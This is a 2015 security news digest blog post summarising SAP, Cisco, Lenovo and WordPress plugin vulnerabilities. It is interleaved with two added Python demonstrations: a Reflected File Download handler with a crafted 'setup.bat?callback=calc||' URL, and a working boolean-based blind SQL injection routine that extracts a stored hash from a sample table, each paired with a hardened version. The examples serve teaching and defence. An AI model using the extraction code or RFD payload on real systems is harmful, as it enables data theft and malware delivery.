Gotham Security Daily Threat Alerts

By Nancy Rand
Posted in Security
On August 14, 2015

August 13, Securityweek – (International) SAP Security updates patch 22 vulnerabilities. SAP released patches for 22 vulnerabilities and updated four previously released patches. Among the fixes are a remote code execution flaw in SAP ST-P that an attacker could leverage to compromise SAP servers and access the information stored on them, and a Reflected File Download (RFD) vulnerability in SAP’s NetWeaver AFP Servlet that could be exploited to deliver malware to victims’ devices through a specially crafted link: the victim’s browser saves attacker-controlled content as a file that appears to originate from the trusted SAP host. Source
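To make the RFD mechanism concrete, here is an added example (not SAP code and not taken from the Securityweek article): a constructed JSONP-style endpoint, modelled as a plain function returning status, headers and body, in a vulnerable form beside a hardened one, plus a check for the two ingredients RFD needs. The endpoint path `/api/data`, the parameter name `callback` and the payload `calc||` are assumptions used for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed example, not any vendor's code. A JSONP endpoint reflects the
# "callback" parameter into the response body. RFD needs two things:
#   1. attacker-controlled bytes at the start of the body, and
#   2. an attacker-chosen download filename (a semicolon path parameter such as
#      /api/data;/setup.bat works when the server sets no filename itself).
# On Windows the saved "setup.bat" then contains `calc||({"status":"ok"});`,
# which runs calc and ignores the rest.

SAFE_CALLBACK = re.compile(r"^[A-Za-z0-9_.]{1,64}$")   # assumed allow-list
DANGEROUS_EXT = (".bat", ".cmd", ".exe", ".com", ".vbs", ".js")


def _callback(url):
    """Return the raw callback parameter from the URL ("" if absent)."""
    return parse_qs(urlsplit(url).query).get("callback", [""])[0]


def vulnerable_handler(url):
    """Reflects the callback verbatim and sets no download filename."""
    cb = _callback(url)
    body = f'{cb}({{"status":"ok"}});'
    return 200, {"Content-Type": "application/json"}, body


def hardened_handler(url):
    """Allow-lists the callback, prefixes the body so attacker input never
    starts it, pins the filename, and disables MIME sniffing."""
    cb = _callback(url)
    if not SAFE_CALLBACK.match(cb):
        return 400, {"Content-Type": "text/plain"}, "invalid callback"
    body = f'/**/{cb}({{"status":"ok"}});'   # "/**/" prefix is a common JSONP defence
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="data.json"',
    }
    return 200, headers, body


def rfd_exposure(handler, url):
    """Heuristic check: could a browser save attacker-controlled bytes under an
    attacker-chosen executable filename for this request?"""
    status, headers, body = handler(url)
    if status != 200:
        return False
    filename_fixed = "filename=" in headers.get("Content-Disposition", "")
    # Without a server-set filename, browsers derive it from the last path segment.
    last_segment = urlsplit(url).path.rsplit("/", 1)[-1].lower()
    attacker_names_file = (not filename_fixed) and last_segment.endswith(DANGEROUS_EXT)
    payload = _callback(url)
    attacker_controls_body = payload != "" and body.startswith(payload)
    return attacker_names_file and attacker_controls_body


if __name__ == "__main__":
    crafted = "https://example.test/api/data;/setup.bat?callback=calc||"
    print("vulnerable exposed:", rfd_exposure(vulnerable_handler, crafted))
    print("hardened exposed:  ", rfd_exposure(hardened_handler, crafted))
```

The check is deliberately conservative: it only flags a response when both conditions hold, since a pinned `Content-Disposition` filename alone already breaks the attack, and a strict callback allow-list alone removes the attacker's control over the first bytes of the file.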

August 13, Help Net Security – (International) Cisco spots attackers hijacking its networking gear by modifying firmware. Cisco reported in-the-wild attacks in which attackers first gain administrative or physical access to a Cisco IOS device and then replace the IOS ROMMON (the device’s boot firmware) with a malicious ROMMON image in order to manipulate device behavior. Because the malicious image lives in the boot firmware rather than in the IOS software image, it survives reboots and IOS upgrades, so verifying ROMMON integrity is part of any investigation. Source

August 12, The Register – (International) CAUGHT: Lenovo crams unremovable crapware into Windows laptops – by hiding it in the BIOS. Security researchers reported that Lenovo shipped laptops whose BIOS firmware reinstalls the Lenovo Service Engine (LSE) software at boot via the Windows Platform Binary Table (WPBT) mechanism, so the software returns even after a clean Windows installation. LSE was found to contain a buffer-overflow flaw that could be exploited to gain administrator-level privileges. The LSE software is no longer included in new laptops. Source

August 12, Threatpost – (International) Vulnerabilities identified in several WordPress plugins. Researchers from dxw Security discovered cross-site scripting (XSS) and blind SQL injection vulnerabilities in the iframe plugin version 3.0, the Google Analytics by Yoast plugin, and the Symposium plugin for WordPress; some of the flaws could allow lower-privileged users to gain administrative privileges. Source
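Blind SQL injection is worth seeing in working form, since it is easy to dismiss as "only a boolean result". The following is an added example that is not dxw’s research code and not any plugin’s code: a constructed SQLite table standing in for a plugin’s user table, a lookup written with string concatenation beside the parameterized version, and a boolean-based extraction routine that recovers a stored value one character at a time through nothing but yes/no answers. Table and column names, the `admin` row and the `h4sh` value are all assumptions.

```python
import sqlite3

# Constructed sample data, not from any real plugin.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'h4sh')")
    conn.execute("INSERT INTO users VALUES (2, 'bob', 'x')")
    return conn


def user_exists_vulnerable(conn, user_id):
    """String-built query: the untrusted value becomes part of the SQL text."""
    row = conn.execute(f"SELECT 1 FROM users WHERE id = {user_id}").fetchone()
    return row is not None


def user_exists_fixed(conn, user_id):
    """Parameterized query: the value is bound, never parsed as SQL."""
    row = conn.execute("SELECT 1 FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


def extract_blind(oracle, length):
    """Boolean-based blind extraction of users.pass_hash for login 'admin'.

    `oracle(payload)` returns True when the injected condition holds.  Each
    character is found by binary search over printable ASCII (32..126), so at
    most 7 yes/no queries per character; nothing from the table is ever
    returned directly, which is what makes the injection 'blind'.
    """
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (
                "1 AND unicode(substr((SELECT pass_hash FROM users "
                f"WHERE login='admin'),{pos},1)) > {mid}"
            )
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


def attack(lookup, length=4):
    """Run the extraction against a given lookup function on a fresh DB."""
    conn = make_db()
    return extract_blind(lambda p: lookup(conn, p), length)


if __name__ == "__main__":
    print("vulnerable lookup leaks:", attack(user_exists_vulnerable))
    print("fixed lookup leaks:     ", repr(attack(user_exists_fixed)))
```

Against the parameterized lookup the bound string `1 AND unicode(...)` is compared to the integer column as data, never matches, and the search collapses to spaces; the same payload against the concatenated query reads the value out in about two dozen requests. Note the oracle here only needs a presence/absence signal, which is exactly what a plugin page that renders differently for an existing versus missing record provides.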

Nancy Rand

Nancy has more than 20 years’ experience in information technology and security, solving business issues and implementing best-practice solutions that support organizational objectives. Her expertise includes leveraging, optimizing, and implementing diverse technology platforms, and management of large-scale technology projects.